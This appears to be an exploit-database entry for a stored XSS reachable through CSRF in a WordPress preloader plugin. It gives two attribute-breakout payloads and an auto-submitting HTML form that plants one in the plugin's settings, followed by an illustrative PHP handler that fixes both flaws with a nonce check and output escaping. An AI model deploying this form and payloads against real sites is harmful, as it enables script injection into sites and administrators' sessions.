## https://sploitus.com/exploit?id=WPEX-ID:972ECDE8-3D44-4DD9-81E3-643D8737434F
Depending on the payload, the XSS will be triggered either in the frontend or backend:

Frontend: " onload=alert(/XSS/)//
Backend: " style=animation-name:rotation onanimationstart=alert(/XSS/)//

<form action="https://example.com/wp-admin/options-general.php?page=flat-preloader" method="post" id="csrf">
<input type="hidden" name="preloader-style" value="windows-10/circles-menu-1.gif">
<input type="hidden" name="preloader-display" value="all">
<input type="hidden" name="preloader[custom_image_url]" value="">
<input type="hidden" name="preloader[text_under_icon]" value="">
<input type="hidden" name="preloader[delay_time]" value="">
<input type="hidden" name="preloader[alt]" value='PAYLOAD'>
<input type="hidden" name="save-option" value="Save Changes">
</form>
<script>csrf.submit()</script>
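
A defensive counterpart to the proof of concept above, as an added example that is not the plugin's own code: a WordPress settings handler that rejects the cross-site POST with a nonce check and escapes the stored `alt` value wherever it is printed. The `fp_*` function names, the nonce names and the option name are assumptions; the form field names are the ones in the PoC.

```php
<?php
// Hypothetical settings handler for a plugin page like the one targeted above.
// All fp_* / FP_* names are assumptions for illustration, not the plugin's code.
const FP_NONCE_ACTION = 'fp_save_settings';
const FP_NONCE_FIELD  = 'fp_nonce';
const FP_OPTION       = 'fp_preloader';

// Call inside the settings <form>: emits a hidden per-user, per-action token.
function fp_render_nonce() {
    wp_nonce_field( FP_NONCE_ACTION, FP_NONCE_FIELD );
}

// Handle the POST. A form hosted on another origin cannot supply a valid
// nonce, so the auto-submitted request is rejected before anything is stored.
function fp_save_settings() {
    if ( ! isset( $_POST['save-option'] ) ) {
        return;
    }
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }
    check_admin_referer( FP_NONCE_ACTION, FP_NONCE_FIELD ); // dies if missing or invalid

    $in = isset( $_POST['preloader'] ) && is_array( $_POST['preloader'] )
        ? wp_unslash( $_POST['preloader'] )
        : array();
    $s = fn( $k ) => is_string( $in[ $k ] ?? null ) ? $in[ $k ] : '';
    // sanitize_text_field() strips tags but keeps quotes; output escaping is still required.
    $clean = array(
        'alt'              => sanitize_text_field( $s( 'alt' ) ),
        'text_under_icon'  => sanitize_text_field( $s( 'text_under_icon' ) ),
        'custom_image_url' => esc_url_raw( $s( 'custom_image_url' ) ),
        'delay_time'       => absint( $s( 'delay_time' ) ),
    );
    update_option( FP_OPTION, $clean );
}
add_action( 'admin_init', 'fp_save_settings' );

// Escape for the attribute context on every page that prints the value
// (frontend and admin), so a stored double quote cannot close the attribute.
function fp_render_image( $src ) {
    $opt = get_option( FP_OPTION, array() );
    printf(
        '<img src="%s" alt="%s">',
        esc_url( $src ),
        esc_attr( $opt['alt'] ?? '' )
    );
}
```

The nonce check addresses the CSRF delivery, and `esc_attr()` addresses the stored XSS; either one alone leaves the other issue open.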